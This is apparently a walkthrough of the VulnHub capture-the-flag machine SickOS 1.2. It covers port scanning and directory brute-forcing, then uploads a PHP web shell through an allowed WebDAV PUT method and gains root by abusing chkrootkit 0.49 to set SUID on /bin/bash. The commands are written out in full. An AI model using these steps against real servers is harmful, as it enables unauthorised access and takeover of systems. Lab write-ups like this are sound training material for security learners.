Machine Information
- SickOS 1.2
- Author:
D4rk
Host discovery
- target IP:
192.168.188.167
Information Gathering
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
nmap -p- -T4 192.168.188.167 -A -oA 192.168.188.167
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-30 14:30 +08
Nmap scan report for 192.168.188.167
Host is up (0.00056s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 66:8c:c0:f2:85:7c:6c:c0:f6:ab:7d:48:04:81:c2:d4 (DSA)
| 2048 ba:86:f5:ee:cc:83:df:a6:3f:fd:c1:34:bb:7e:62:ab (RSA)
|_ 256 a1:6c:fa:18:da:57:1d:33:2c:52:e4:ec:97:e2:9e:af (ECDSA)
80/tcp open http lighttpd 1.4.28
|_http-server-header: lighttpd/1.4.28
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:1F:F5:5E (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (93%), Linux 3.16 - 4.6 (93%), Linux 3.2 - 4.9 (93%), Linux 4.4 (93%), Linux 3.13 (90%), Linux 3.18 (89%), Linux 4.2 (89%), Linux 3.13 - 3.16 (87%), Linux 3.16 (87%), OpenWrt Chaos Calmer 15.05 (Linux 3.18) or Designated Driver (Linux 4.1 or 4.4) (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.56 ms 192.168.188.167
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 106.75 seconds
Since only port 22 and 80, this should be focusing on port 80 most of the time.
Exploiting Port 80
After looking around the website, there are no useful information that I could abuse or take note. So I decided to brute force the directory first.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u http://192.168.188.167/ -x php,html,js,css,txt,bak
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.188.167/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,js,css,txt,bak
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 163]
/test (Status: 301) [Size: 0] [--> http://192.168.188.167/test/]
/%7echeckout%7e (Status: 403) [Size: 345]
Progress: 1453501 / 1453508 (100.00%)
===============================================================
Finished
===============================================================
The result of directory bruteforcing is also not useful as there’s nothing that I could make use of. Since I do not have any idea, I tried to look for everything again and found someting useful.
1
2
3
4
5
6
7
8
9
curl -IX OPTIONS http://192.168.188.167/test
HTTP/1.1 301 Moved Permanently
DAV: 1,2
MS-Author-Via: DAV
Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
Location: http://192.168.188.167/test/
Content-Length: 0
Date: Tue, 30 Jan 2024 06:47:39 GMT
Server: lighttpd/1.4.28
Although the test
directory is useless, the HTTP OPTIONS allowed in the directory has alot of useful OPTIONS such as PUT and COPY. PUT method in the web server allow me to just upload any files. To use the PUT method, I use curl
command to upload the file.
1
2
3
4
5
curl -X PUT http://192.168.188.167/test/wee.php -d '<?php system($_GET[0]); ?>'
curl 'http://192.168.188.167/test/wee.php?0=id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
With that, I managed to upload a PHP file just by abusing PUT method. I then spawn a reverse shell from there and continue with privilege escalation.
1
2
3
4
5
nc -nvlp 443
listening on [any] 443 ...
connect to [192.168.188.128] from (UNKNOWN) [192.168.188.167] 36704
bash: no job control in this shell
www-data@ubuntu:/var/www/test$
The reverse shell is weird as it only spawn if the port is 443. Lets stabilize the shell before moving on.
Privilege Escalation
I started out by searching for useful information as well as using linpeas.sh
1
2
3
www-data@ubuntu:/etc/cron.daily$ ls
apt bsdmainutils dpkg logrotate mlocate popularity-contest
aptitude chkrootkit lighttpd man-db passwd standard
After searching for awhile, I noticed chrootkit
which have a local privilege escalation exploit. I then tried to check if the version is same or not.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
www-data@ubuntu:/etc/cron.daily$ find / -name *chkrootkit* 2>/dev/null
/usr/sbin/chkrootkit
/etc/cron.daily/chkrootkit
www-data@ubuntu:/etc/cron.daily$ head /usr/sbin/chkrootkit
#! /bin/sh
# -*- Shell-script -*-
# $Id: chkrootkit, v 0.49 2009/07/30
CHKROOTKIT_VERSION='0.49'
# Authors: Nelson Murilo <nelson@pangeia.com.br> (main author) and
# Klaus Steding-Jessen <jessen@cert.br>
#
# (c)1997-2009 Nelson Murilo, Pangeia Informatica, AMS Foundation and others.
www-data@ubuntu:/etc/cron.daily$
With that, I have confirmed that the version is exactly the same. Now that it is same, I could just use the exploit and get root. Based on the exploit, It will execute /tmp/update
as root because of the function slapper().
1
2
3
4
www-data@ubuntu:/tmp$ echo "chmod u+s /bin/bash" > update
www-data@ubuntu:/tmp$ chmod 755 update
www-data@ubuntu:/tmp$ ls -la /bin/bash
-rwsr-xr-x 1 root root 920788 Mar 28 2013 /bin/bash
Now that the /bin/bash
has SUID binaries, I could just get root access with that.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
www-data@ubuntu:/tmp$ /bin/bash -p
/bin/bash -p
whoami
root
cd /root
ls
304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gz
7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
chkrootkit-0.49
newRule
cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
WoW! If you are viewing this, You have "Sucessfully!!" completed SickOs1.2, the challenge is more focused on elimination of tool in real scenarios where tools can be blocked during an assesment and thereby fooling tester(s), gathering more information about the target using different methods, though while developing many of the tools were limited/completely blocked, to get a feel of Old School and testing it manually.
Thanks for giving this try.
@vulnhub: Thanks for hosting this UP!.
Things I learned from the machine
- Upload file with PUT method is OP
- privilege escalation with cronjob but using chkrootkit